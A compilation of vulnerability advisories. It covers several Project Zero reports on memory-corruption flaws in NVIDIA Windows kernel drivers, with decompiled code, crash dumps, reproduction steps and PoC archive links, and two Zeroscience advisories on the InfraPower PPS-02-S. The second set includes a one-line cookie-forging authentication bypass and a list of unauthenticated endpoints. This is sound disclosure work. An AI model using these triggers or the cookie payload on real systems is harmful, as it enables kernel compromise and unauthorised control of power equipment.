To reproduce, compile the PoC as an x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
for it to work, as the escape data must contain the right values (e.g. a
field that appears to be the GPU bus/device/function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40662.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=927
The DxgkDdiEscape handler for escape code 0x100010b looks like:
/* Decompiler pseudocode quoted in the report; `result` and `handle_` are
   undeclared in this excerpt and the stray ')' before ExEventObjectType is
   in the original transcription. */
char escape_100010b(NvMiniportDeviceContext *miniport_context, HANDLE handle, unsigned int idx)
{
    PVOID *Object;
    if ( !handle )
        do_debug_thingo();
    /* idx comes from the user-mode escape data and is not bounds-checked,
       so Object can point anywhere relative to miniport_context. */
    Object = (PVOID *)&miniport_context->UNKNOWN[8 * idx + 22696];
    /* Per the report, ObReferenceObjectByHandle writes NULL through Object
       before validating the handle, so the out-of-bounds write happens even
       for an invalid handle; on success the KEVENT pointer is stored there. */
    if ( !ObReferenceObjectByHandle(handle_, SYNCHRONIZE, )ExEventObjectType, UserMode, Object, 0i64) )
    {
        result = 0;
        if ( *Object )
            result = UserMode;
    }
    return result;
}
It essentially takes in a user mode event handle from userspace, and calls
ObReferenceObjectByHandle on it, writing the object pointer to |Object|. Note
that the kernel implementation of ObReferenceObjectByHandle always begins with
writing NULL to this pointer regardless of whether or not the handle is valid.
|Object| is calculated using a user provided index that is not bounds checked,
leading to OOB write of either NULL or the KEVENT pointer:
Object = (PVOID *)&miniport_context_->UNKNOWN[8 * idx + 22696];
The attached PoC causes the following crashing context on Win x64 372.54:
PAGE_FAULT_IN_NONPAGED_AREA (50)
...
rax=ffffe0025ea28f50 rbx=0000000000000000 rcx=0000000000000000
rdx=0000000000100000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801d8f3daf5 rsp=ffffd000203deda0 rbp=0000000000000001
r8=ffffe000506d4b50 r9=ffffe000524fb201 r10=0000000000000000
r11=ffffd000203df370 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
nt!ObReferenceObjectByHandleWithTag+0x45:
fffff801`d8f3daf5 488908 mov qword ptr [rax],rcx ds:ffffe002`5ea28f50=????????????????
To reproduce, compile as an x64 executable and run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40661.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=918
The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
In this particular routine,
if ( cur->image_names_count > 0 ) {
// info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
image_filename = info_->ImageFileName;
buf = image_filename->Buffer;
if ( buf )
{
if ( !v5 )
{
i = 0i64;
num_chars = image_filename->Length / 2;
// Look for the filename by scanning for backslash.
if ( num_chars )
{
while ( buf[num_chars - (unsigned int)i - 1] != '\\' )
{
i = (unsigned int)(i + 1);
if ( (unsigned int)i >= num_chars )
goto LABEL_39;
}
buf += num_chars - (unsigned __int64)(unsigned int)i;
}
LABEL_39:
v26 = (unsigned int)i;
wcscpy_s((wchar_t *)Dst, i, buf);
Dst[v26] = 0;
wcslwr((wchar_t *)Dst);
v5 = 1;
wcscpy_s is used incorrectly here, as the second argument is not the size of
|Dst|, but rather the calculated size of the filename. |Dst| is a stack buffer
that is at least 255 characters long. The maximum path-component length on most
Windows filesystems is <= 255 characters, so with an ordinary local path the copy
cannot overflow |Dst|.
However, one can pass UNC paths to CreateProcessW containing forward slashes as
the path delimiter, which means that the extracted filename here can be
"a/b/c/...", leading to a buffer overflow. Additionally, this function has no
stack cookie.
e.g.
CreateProcessW(L"\\\\?\\UNC\\127.0.0.1@8000\\DavWWWRoot\\..../..../..../blah.exe", ...
Crashing context with my PoC (Win 10 x64 with 372.54):
NvStreamKms+0x1c6a:
fffff801`5c791c6a c3 ret
kd> dqs rsp
ffffd000`25bc5d18 00410041`00410041
kd> t
...
KMODE_EXCEPTION_NOT_HANDLED (1e)
...
FAULTING_IP:
NvStreamKms+1c6a
fffff800`5b1d1c6a c3 ret
To reproduce, a WebDAV server is required (it can be localhost), and the WebClient
service needs to be running (an unprivileged user can trigger its start).
Then, run setup to create the long path to the target executable (you'll need to
change the base directories), and then run poc_part1, and then poc_part2 (with
the right UNC path) on the target machine.
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40660.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=911
The DxgkDdiEscape handler for 0x600000D passes an unchecked user provided
pointer as the destination for a memcpy call. This leads to kernel memory
corruption.
(Win 10 x64 372.54) crashing context with PoC:
SYSTEM_SERVICE_EXCEPTION (3b)
CONTEXT: ffffd000c076c8b0 -- (.cxr 0xffffd000c076c8b0)
rax=0000000000000880 rbx=0000000000000000 rcx=000000000000000f
rdx=bebe9ec057cc7d47 rsi=ffffd000c076d870 rdi=ffffe001990da008
rip=fffff8010f1eab00 rsp=ffffd000c076d2d8 rbp=ffffd000c076d360
r8=0000000000003ff1 r9=fffff8010f217d48 r10=fffff78000000008
r11=4141414141414141 r12=0000000000000000 r13=ffffe001990dbe88
r14=ffffe001945f1201 r15=0000000000004000
iopl=0 nv up ei pl nz ac pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010212
nvlddmkm+0x5dab00:
fffff801`0f1eab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires WDK for D3DKMTEscape),
and run.
For completeness, many of the other escape handlers in the same function appear to have the same issue: they write to user-provided pointers without any validation. The code is adjacent within the same function, so this should have been obvious during review.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40659.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=895
The DxgkDdiEscape handler for 0x7000194 doesn't do bounds checking with the
user provided lengths it receives. When these lengths are passed to memcpy,
overreads and memory corruption can occur.
void __fastcall escape_7000194(NvMiniportDeviceContext *ctx, Escape7000194 *escape_data)
...
alloc_0_ = ExAllocatePoolWithTag_(PagedPool, escape->size_0, 0x7061564Eu);
...
alloc_1 = ExAllocatePoolWithTag_(PagedPool, escape->size_1, 0x7061564Eu);
..
if ( (_BYTE)v11 ) {
memcpy(alloc_0, escape->buf_0, escape->size_0);
memcpy(alloc_1, escape->buf_2, escape->size_1);
}
v8 = Escape7Handler(0i64, dword_7DCB84, *(_DWORD *)(v3 + 24), 0x402C0105, &escape->data, 96);
v9 = v8;
if ( !(_BYTE)v11 && !v8 )
memcpy(escape->buf_0, alloc_0, escape->size_0);
...
The PoC I've provided causes an OOB read, but it should be possible to pass an
input that results in the third memcpy being executed instead of the first two,
which leads to kernel memory corruption (OOB write).
(Win 10 x64 372.54) crashing context with PoC:
PAGE_FAULT_IN_NONPAGED_AREA (5)
...
Some register values may be zeroed or incorrect.
rax=0000000000000007 rbx=0000000000000000 rcx=ffffc000f5220f80
rdx=fffffffff3d5509c rsi=0000000000000000 rdi=0000000000000000
rip=fffff8007d4dad66 rsp=ffffd00166b9d2a8 rbp=ffffc000e8f55038
r8=0000000000020fc0 r9=000000000006603e r10=0000000000020000
r11=ffffc000f5200000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
nvlddmkm+0x5dad66:
fffff800`7d4dad66 f30f6f4c0ae0 movdqu xmm1,xmmword ptr [rdx+rcx-20h] ds:ffffc000`e8f75ffc=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. The PoC may need adjusting,
because the escape data must contain values that are correct for the target
machine (e.g. a field that appears to be the GPU bus/device/function); the PoC
attempts to populate these for the machine it is running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40658.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=894
The DxgkDdiEscape handler for 0x700010d accepts a user provided pointer as the
destination for a memcpy call, without doing any checks on said pointer.
void __fastcall escape_700010D(NvMiniportDeviceContext* ctx, NvEscapeData *escape)
{
...
v8 = escape->unknown_2;
if ( v8 == 1 )
{
data.size = escape->size;
data.buf = ExAllocatePoolWithTag((POOL_TYPE)512, 0xC08i64 * data.size, 0x7061564Eu);
v9 = Escape7Handler(0i64, dword_7DCB84, dword_7DCB84, 626, &data, 0x190);
}
...
else if ( escape->unknown_2 == 1 )
{
memcpy(escape->user_ptr, data.buf, 3080i64 * escape->size);
(Win 10 x64 372.54) crashing context with PoC (in memcpy) on a write to 0x4141414141414141:
SYSTEM_SERVICE_EXCEPTION (3b)
...
CONTEXT: ffffd0002d2ab5c0 -- (.cxr 0xffffd0002d2ab5c0)
rax=0000000000000001 rbx=ffffc0016c9b9b40 rcx=000000000000000f
rdx=bebe9ebf4b4e0ecf rsi=0000000000000001 rdi=000000007061564e
rip=fffff8005488ab00 rsp=ffffd0002d2abfe8 rbp=ffffd0002d2ac0f0
r8=0000000000000bf9 r9=ffffd00024014ac0 r10=0000000000000000
r11=4141414141414141 r12=0000000000000340 r13=fffff800542b0000
r14=ffffe0008fb2d000 r15=0000000000000001
iopl=0 nv up ei pl nz ac po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010216
nvlddmkm+0x5dab00:
fffff800`5488ab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. The PoC may need adjusting,
because the escape data must contain values that are correct for the target
machine (e.g. a field that appears to be the GPU bus/device/function); the PoC
attempts to populate these for the machine it is running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40657.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=892
The handler for the DxgkDdiEscape escape code 0x70000D4 has the following pseudocode:
void __fastcall escape_70000D4(NvMiniportDeviceContext *a1, NvEscapeData *a2)
{
// Decompiled DxgkDdiEscape handler for escape code 0x70000D4. This is decompiler
// pseudocode: type and field names are reconstructed. a2 is the user-supplied
// escape buffer, so user_ptr_size and user_ptr are attacker-controlled.
Escape70000D4 *escape_data_; // rbx@1
PVOID alloc_buf; // rsi@1
unsigned int v4; // edi@1
__int64 user_ptr; // r14@4
DWORD *v6; // rbx@5
__int128 v7; // [rsp+40h] [rbp-38h]@1
__int128 v8; // [rsp+50h] [rbp-28h]@4
PVOID alloc_buf_; // [rsp+60h] [rbp-18h]@4
escape_data_ = (Escape70000D4 *)a2;
// Presumably a status field; it is overwritten with an encoded error below when v4 != 0.
a2->unknown_rest[6] = 1;
// Zeroes 40 bytes starting at v7: v7 (16), v8 (16) and alloc_buf_ (8) are contiguous on the
// stack (see the rsp offsets above) and are passed to sub_625BC as one 40-byte struct.
LODWORD(v7) = 0;
memset((char *)&v7 + 4, 0, 0x24ui64);
// Paged-pool allocation sized directly from user input; ExAllocatePoolWithTag does not
// zero the allocation. 'paVN' is the same tag as 0x7061564Eu used in the free below.
alloc_buf = ExAllocatePoolWithTag_(PagedPool, escape_data_->user_ptr_size, 'paVN');
v4 = 0;
if ( !alloc_buf )
v4 = 0xFFFF; // allocation failure: take the error path and skip the copy
if ( v4 )
goto LABEL_12;
HIDWORD(v8) = escape_data_->user_ptr_size;
alloc_buf_ = alloc_buf;
// Internal call that receives the pool buffer via alloc_buf_ inside the &v7 struct.
// Its status v4 is not checked before the copy below, and nothing visible here
// establishes how many bytes (if any) it writes into alloc_buf.
v4 = sub_625BC(0i64, dword_B1BB94, escape_data_->unknown_0, 0x83F30101, (__int64)&v7, 40);
user_ptr = escape_data_->user_ptr;
// ProbeForWrite checks that the user range is writable but raises on a bad pointer.
// No __try is visible in this pseudocode; if the decompiler did not drop an SEH frame,
// an exception here would skip ExFreePoolWithTag below (pool leak) -- TODO confirm.
ProbeForWrite((PVOID)escape_data_->user_ptr, escape_data_->user_ptr_size, UserMode);
// Info leak: user_ptr_size bytes of the pool buffer are copied to user mode regardless
// of v4, and with the PoC the buffer is never written first. A fix would zero the
// allocation (or copy only the length actually produced) and honour v4 before copying.
memcpy((void *)escape_data_->user_ptr, alloc_buf, escape_data_->user_ptr_size);
// Write the 32-byte v7/v8 result back into the escape buffer. The save/restore of
// user_ptr around the v8 store suggests the store overlaps the user_ptr field -- inferred.
*(_OWORD *)&escape_data_->unknown_2 = v7;
*(_OWORD *)&escape_data_->unknown_4 = v8;
escape_data_->user_ptr = user_ptr;
if ( v4 )
{
LABEL_12:
// Error reporting: store an encoded status (-4096 - v4) in the header field set to 1 above.
// The NULL test on v6 is always true since v6 is an address-of expression.
v6 = &escape_data_->header.unknown_rest[6];
if ( v6 )
{
if ( v4 <= 0xFFFFF000 )
*v6 = -4096 - v4;
}
}
if ( alloc_buf )
ExFreePoolWithTag_(alloc_buf, 0x7061564Eu);
}
ExAllocatePoolWithTag is called with a user-provided size, and the resulting buffer is later copied back to the user-provided pointer. In the pseudocode above the buffer is never visibly initialised before that copy, so a user-mode program can leak uninitialised pool memory from arbitrarily-sized allocations (see the correction below regarding sub_625BC).
########
Looks like I made an oversimplified analysis of the pseudocode in the report. The allocated buffer pointer is indeed passed off to the sub_625BC function (as part of a struct member on the stack) which eventually passes it to a bunch of other functions.
However, this doesn't change the fact that with the provided PoC, the pool allocated buffer still isn't being initialised and is copied into the user buffer unchanged.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40656.zip
InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient client application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The device does not properly perform authentication, allowing it to
be bypassed through cookie manipulation. The vulnerable function checkLogin()
in 'Function.php' only tests whether $_SESSION['Login'] is non-empty and never
validates its value, so any non-empty value passes the check. Note that, as
quoted below, the check reads the PHP session rather than a request cookie
directly; the PoC works by setting a cookie named 'Login', which implies that
on this PHP 5.3.9 build the session variable is populated from request data
(e.g. register_globals-style behaviour) -- confirm against the device's PHP
configuration.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5374
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
27.09.2016
--
(example) System.php:
---------------------
1: <?php
2:
3: require_once("Function.php");
4: session_start();
5: if(!checkLogin())
6: header('Location: Login.php');
7:
---------------------------------------
Function.php:
-------------
155: function checkLogin(){
156: if(empty($_SESSION['Login']))
157: return false;
158: return true;
159: }
160:
--------------------
'Sessioned' scripts:
➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();
➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();
➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
PoC:
javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
--
InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient client application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: Insecure Direct Object References occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system directly, for
example APIs, files, upload utilities, device settings, etc. On this
firmware none of the scripts listed below appear in the session_start()
or checkLogin() call sites enumerated in ZSL-2016-5374, so they do not
themselves gate access on a session and are reachable by an
unauthenticated client.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5373
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
27.09.2016
--
GET /ConnPort.php
GET /CSSSource.php
GET /dball.php
GET /doupgrate.php
GET /IPSettings.php
GET /ListFile.php
GET /Menu.php
GET /Ntp.php
GET /PDUDetails_Ajax_Details.php
GET /PDULog.php
GET /PortSettings.php
GET /production_test1.php ("backdoor")
GET /UploadEXE.php